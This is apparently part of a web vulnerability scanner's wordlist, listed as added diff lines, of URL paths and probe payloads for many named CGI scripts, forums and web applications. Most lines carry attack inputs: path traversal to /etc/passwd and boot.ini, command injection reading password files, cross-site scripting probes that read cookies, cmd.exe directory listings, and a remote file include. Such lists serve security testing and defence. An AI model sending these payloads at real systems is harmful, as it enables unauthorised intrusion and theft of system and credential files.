+cgi-bin/visitor.exe
+cgi-bin/vote.cgi
+cgi-bin/vpasswd.cgi
+cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
+cgi-bin/w3-msql
+cgi-bin/w3-sql
+cgi-bin/wais.pl
+cgi-bin/way-board.cgi?db=/etc/passwd%00
+cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
+cgi-bin/wconsole.dll
+cgi-bin/webais
+cgi-bin/webbbs.cgi
+cgi-bin/webbbs.exe
+cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
+cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
+cgi-bin/webdist.cgi
+cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
+cgi-bin/webdriver
+cgi-bin/webfind.exe?keywords=01234567890123456789
+cgi-bin/webgais
+cgi-bin/webif.cgi
+cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/webmap.cgi
+cgi-bin/webnews.pl
+cgi-bin/webplus.exe?about
+cgi-bin/webplus?about
+cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
+cgi-bin/websendmail
+cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
+cgi-bin/webutil.pl
+cgi-bin/webutils.pl
+cgi-bin/webwho.pl
+cgi-bin/wguest.exe
+cgi-bin/where.pl?sd=ls%20/etc
+cgi-bin/whois.cgi?action=load&whois=%3Bid
+cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
+cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
+cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
+cgi-bin/windmail
+cgi-bin/windmail.exe
+cgi-bin/wrap
+cgi-bin/ws_ftp.ini
+cgi-bin/www-sql
+cgi-bin/wwwadmin.pl
+cgi-bin/wwwboard.cgi.cgi
+cgi-bin/wwwboard.pl
+cgi-bin/wwwstats.pl
+cgi-bin/wwwthreads/3tvars.pm
+cgi-bin/wwwthreads/w3tvars.pm
+cgi-bin/wwwwais
+cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
+cgi-bin/zsh
+cgi-dos/args.bat
+cgi-lib.pl
+cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
+cgi-local/cgiemail-1.4/cgicso?query=AAA
+cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
+cgi-local/cgiemail-1.6/cgicso?query=AAA
+cgi-shl/win-c-sample.exe
+cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
+cgi-sys/FormMail-clone.cgi
+cgi-sys/addalink.cgi
+cgi-sys/cgiecho
+cgi-sys/cgiemail
+cgi-sys/countedit
+cgi-sys/domainredirect.cgi
+cgi-sys/entropybanner.cgi
+cgi-sys/entropysearch.cgi
+cgi-sys/helpdesk.cgi
+cgi-sys/mchat.cgi
+cgi-sys/randhtml.cgi
+cgi-sys/realhelpdesk.cgi
+cgi-sys/realsignup.cgi
+cgi-sys/scgiwrap
+cgi-sys/signup.cgi
+cgi-win/cgitest.exe
+cgi-win/uploader.exe
+cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
+cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
+cgi/cgiproc?
+cgicso?query=<script>alert('Vulnerable')</script>
+cgicso?query=<script>alert('XSS')</script>
+cgicso?query=AAA
+cgiforum.pl?thesection=../../../../../../../../../../etc
+cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
+cgimail.exe
+cgis/wwwboard/wwwboard.cgi
+cgis/wwwboard/wwwboard.pl
+cgitest.exe
+cgiwrap
+cgiwrap/%3Cfont%20color=red%3E
+cgiwrap/~@U
+cgiwrap/~@USERS
+cgiwrap/~JUNK(5)
+cgiwrap/~root
+change-your-password.pl
+chassis/config/GeneralChassisConfig.html
+chat/!nicks.txt
+chat/!pwds.txt
+chat/data/usr
+chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
+chat_dir/register.php
+chatlog.nsf
+checkout_payment.php
+class/mysql.class
+classified.cgi
+classifieds
+classifieds.cgi
+classifieds/classifieds.cgi
+classifieds/index.cgi
+clbusy.nsf
+cldbdir.nsf
+cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
+cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
+clickcount.pl?view=test
+clickresponder.pl
+client/
+cliente/
+clientes/
+clients/
+clocktower/
+clusta4.nsf
+clusterframe.jsp
+clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
+cm/
+cmd.exe?/c+dir
+cmd1.exe?/c+dir
+code.php
+code.php3
+code/
+collect4.nsf
+com
+com/
+com/novell/
+com/novell/gwmonitor/help/en/default.htm
+com/novell/webaccess
+com/novell/webaccess/help/en/default.htm
+com/novell/webpublisher/help/en/default.htm
+com5..........................................................................................................................................................................................................................box
+com5.java
+com5.pl
+commandit.cgi
+comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
+comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
+commerce.cgi?page=../../../../../../../../../../etc
+commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
+common.php?f=0&ForumLang=../../../../../../../../../../etc
+common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
+common/listrec.pl
+common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
+communicator/
+communique.asp
+community/forumdisplay.php
+community/index.php?analized=anything
+community/member.php
+compatible.cgi
+compra/
+compras/
+compressed/
+compte.php
+conecta/
+config.inc
+config.php
+config/
+config/checks.txt
+config/html/cnf_gi.htm
+connect/
+console
+conspass.chl+
+consport.chl+
+content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
+content/base/build/explorer/none.php?/etc/passwd
+contents.php?new_language=elvish&mode=select
+contents/extensions/asp/1
+convert-date.php
+correo/
+count.cgi
+counter-ord
+counter/
+counter/1/n/n/0/3/5/0/a/123.gif
+counterbanner
+counterbanner-ord
+counterfiglet-ord
+counterfiglet/nc/
+cp/rac/nsManager.cgi
+cpa.nsf
+cpanel/
+cplogfile.log
+cpqlogin.htm
+credit/
+crypto/
+cs
+csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+csLive
+csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+csNews.cgi
+csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+csPassword.cgi
+csPassword.cgi?command=remove%20
+csPassword/csPassword.cgi
+csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
+csh
+css
+cstat.pl
+cuenta/
+cuentas/
+current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
+current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
+custdata/
+customerdata.nsf
+customers/
+cutecast/members/
+cutenews/comments.php
+cutenews/index.php?debug
+cutenews/search.php
+cutenews/shownews.php
+cvsblame.cgi?file=<script>alert('Vulnerable')</script>
+cvsblame.cgi?file=<script>alert('XSS')</script>
+cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
+cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
+cvslog.cgi?file=<script>alert('Vulnerable')</script>
+cvslog.cgi?file=<script>alert('XSS')</script>
+cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
+cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
+cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
+cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
+cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
+cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
+da.nsf
+dan_o.dat
+dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
+dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
+dasp/fm_shell.asp
+dat/
+data.sql
+data/
+data/config/microsrv.cfg
+data/fetch.php?page=
+data/member_log.txt
+data/userlog/log.txt
+database.nsf
+database/
+database/db2000.mdb
+database/metacart.mdb
+database/metacart.mdb+
+databases/
+databse.sql
+date
+dato/
+datos/
+day5datacopier.cgi
+day5datanotifier.cgi
+db.nsf
+db.php
+db.php?q='&t='
+db.sql
+db/
+db/users.dat
+db2www/library/document.d2w/show
+db4web_c/dbdirname//etc/passwd
+db_manager.cgi
+dbabble
+dbase/
+dbman/db.cgi?db=no-db
+dbmlparser.exe
+dc/auth_data/auth_user_file.txt
+dc/orders/orders.txt
+dcforum.cgi?az=list&forum=../../../../../../../../../../etc
+dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
+dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
+dclf.nsf
+dcp/advertiser.php
+dcshop/auth_data/auth_user_file.txt
+dcshop/orders/orders.txt
+debug/dbg?host==<script>alert('Vulnerable');</script>
+debug/echo?name=<script>alert('Vulnerable');</script>
+debug/errorInfo?title===<script>alert('Vulnerable');</script>
+debug/showproc?proc===<script>alert('Vulnerable');</script>
+decsadm.nsf
+decsdoc.nsf
+decslog.nsf
+default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+default.nsf
+default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
+default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
+defines.php
+demo/
+demo/basic/simple/viewsrc/welcomeuser.jsp.txt
+demo/ojspext/events/globals.jsa
+demo/sql/index.jsp
+demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
+demos/
+dev/
+dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
+devel/
+development/
+dfire.cgi
+diagnose.cgi
+diapo.php?rep=<script>alert(document.cookie)</script>
+dig.cgi
+dir/
+dirassist.nsf
+directory.php?dir=%3Bcat%20/etc/passwd
+directory/
+directorypro.cgi?want=showcat&show=../../../../../../../../../../etc
+directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
+displayTC.pl
+dltclnt.php
+dms0
+dnewsweb
+do_map
+do_subscribe
+doc
+doc-html/
+doc/
+doc/admin/index.php
+doc/domguide.nsf
+doc/dspug.nsf
+doc/help4.nsf
+doc/helpadmin.nsf
+doc/helplt4.nsf
+doc/internet.nsf
+doc/javapg.nsf
+doc/lccon.nsf
+doc/migrate.nsf
+doc/npn_admn.nsf
+doc/npn_rn.nsf
+doc/packages/
+doc/readmec.nsf
+doc/readmes.nsf
+doc/rt/overview-summary.html
+doc/smhelp.nsf
+doc/srvinst.nsf
+doc/webmin.config.notes
+docs/
+docs/<script>alert('Vulnerable');</script>
+docs/NED
+docs/NED?action=retrieve&location=.
+docs/sdb/en/html/index.html
+docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
+doladmin.nsf
+dols_help.nsf
+domadmin.nsf
+domcfg.nsf
+domguide.nsf
+domlog.nsf
+donothing
+dose.pl?daily&somefile.txt&|ls|
+dostuff.php?action=modify_user
+dotproject/modules/files/index_table.php
+dotproject/modules/projects/addedit.php
+dotproject/modules/projects/view.php
+dotproject/modules/projects/vw_files.php
+dotproject/modules/tasks/addedit.php
+dotproject/modules/tasks/viewgantt.php
+down/
+download.cgi
+download.php?op=viewdownload
+download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
+download/
+downloads/
+downloads/pafiledb.php?action=download&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
+downloads/pafiledb.php?action=email&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
+downloads/pafiledb.php?action=rate&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
+dspug.nsf
+dumpenv.pl
+easylog/easylog.html
+echo.bat
+echo.bat?&dir+c:\\
+edit.pl
+edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
+ejemplo/
+ejemplos/
+email.php
+emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
+emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>
+emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>
+emml_email_func.php
+employees/
+empower?DB=whateverwhatever
+emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
+emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+emumail.cgi?type=.%00
+emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
+emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
+enter.cgi
+entete.php
+enteteacceuil.php
+envia/
+enviamail/
+environ.cgi
+environ.pl
+environ.pl?param1=<script>alert(document.cookie)</script>
+erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
+error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
+error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
+error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
+error/HTTP_NOT_FOUND.html.var
+error_log
+errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
+es/
+eshop.pl/seite=;cat%20eshop.pl|
+esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+etc/passwd
+etc/shadow+
+event.nsf
+eventcal2.php.php
+events.nsf
+events4.nsf
+events5.nsf
+eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
+eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>
+ews/ews/architext_query.pl
+ex-logger.pl
+examples/
+examples/basic/servlet/HelloServlet
+examples/context
+examples/cookie
+examples/forward1
+examples/forward2
+examples/header
+examples/include1
+examples/info
+examples/jsp/index.html
+examples/jsp/snp/anything.snp
+examples/jsp/snp/snoop.jsp
+examples/jsp/source.jsp??
+examples/servlet/AUX
+examples/servlet/TroubleShooter
+examples/servlets/index.html
+examples/session
+examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
+excel/
+exchange/
+exchange/lib/AMPROPS.INC
+exchange/lib/ATTACH.INC
+exchange/lib/DELETE.INC
+exchange/lib/GETREND.INC
+exchange/lib/GETWHEN.INC
+exchange/lib/JSATTACH.INC
+exchange/lib/JSROOT.INC
+exchange/lib/JSUTIL.INC
+exchange/lib/LANG.INC
+exchange/lib/PAGEUTIL.INC
+exchange/lib/PUBFLD.INC
+exchange/lib/RENDER.INC
+exchange/lib/SESSION.INC
+exchange/lib/logon.inc
+exchange/root.asp?acs=anon
+excite
+excite;IF
+excite;IFS=\
+exe/
+exec/show/config/cr
+ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
+ext.ini.%00.txt
+ez2000/ezadmin.cgi
+ez2000/ezboard.cgi
+ez2000/ezman.cgi
+ezadmin.cgi
+ezboard.cgi
+ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
+ezman.cgi
+ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
+ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
+ezshopper2/loadpage.cgi
+ezshopper3/loadpage.cgi
+faqman/index.php
+faqmanager.cgi?toc=/etc/passwd%00
+faxsurvey?cat%20/etc/passwd
+fbsd/
+fcgi-bin/echo
+fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
+fcgi-bin/echo2
+fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
+fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
+fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
+file-that-is-not-real-2002.php3
+file/
+file/../../../../../../../../etc/
+fileadmin/
+filemail
+filemail.pl
+filemanager/filemanager_forms.php
+filemanager/index.php3
+filemgmt/brokenfile.php
+filemgmt/singlefile.php
+filemgmt/viewcat.php
+filemgmt/visit.php
+files/
+finance.xls
+finances.xls
+finger
+finger.pl
+firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
+firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
+flexform
+flexform.cgi
+fom.cgi?file=<script>alert('Vulnerable')</script>
+fom.cgi?file=<script>alert('XSS')</script>
+fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
+fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
+foo.php3
+forgot_password.php?email=\"><script>alert(document.cookie)</script>
+formmail
+formmail.cgi
+formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+formmail.pl
+formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+foro/YaBB.pl
+fortune
+forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd
+forum-ra.asp?n=../../../../../../../../../etc/passwd
+forum-ra.asp?n=../../../../../../../../../etc/passwd%00
+forum-ra.asp?n=/../../../../../../../../../../../boot.ini
+forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
+forum-ra.asp?n=/etc/passwd
+forum-ra.asp?n=/etc/passwd%00
+forum-ra.asp?n=c:\boot.ini
+forum-ra_professionnel.asp?n=%60/etc/passwd%60
+forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00
+forum-ra_professionnel.asp?n=../../boot.ini
+forum-ra_professionnel.asp?n=/....../boot.ini
+forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
+forum-ra_professionnel.asp?n=/../../../../../../etc/passwd
+forum-ra_professionnel.asp?n=/../../../etc/passwd
+forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
+forum-ra_professionnel.asp?n=/etc/passwd
+forum-ra_professionnel.asp?n=/etc/passwd%00
+forum-ra_professionnel.asp?n=c:\boot.ini
+forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
+forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
+forum/
+forum/admin/database/wwForum.mdb
+forum/admin/wwforum.mdb
+forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
+forum/mainfile.php
+forum/member.php
+forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>
+forum/newreply.php
+forum/newthread.php
+forum/viewtopic.php
+forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu
+forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1.asp?n=1753&amp;nn=%60/etc/passwd%60
+forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd
+forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd
+forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00
+forum1.asp?n=1753&amp;nn=/....../boot.ini
+forum1.asp?n=1753&amp;nn=/..../boot.ini
+forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini
+forum1.asp?n=1753&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini
+forum1.asp?n=1753&amp;nn=/etc/passwd
+forum1.asp?n=1753&amp;nn=/etc/passwd%00
+forum1.asp?n=1753&amp;nn=c:\boot.ini
+forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi
+forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren
+forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor
+forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste
+forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec
+forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco
+forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\"./.\"./.\"./.\"./.\"./boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00
+forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini
+forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1
+forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
+forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
+forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
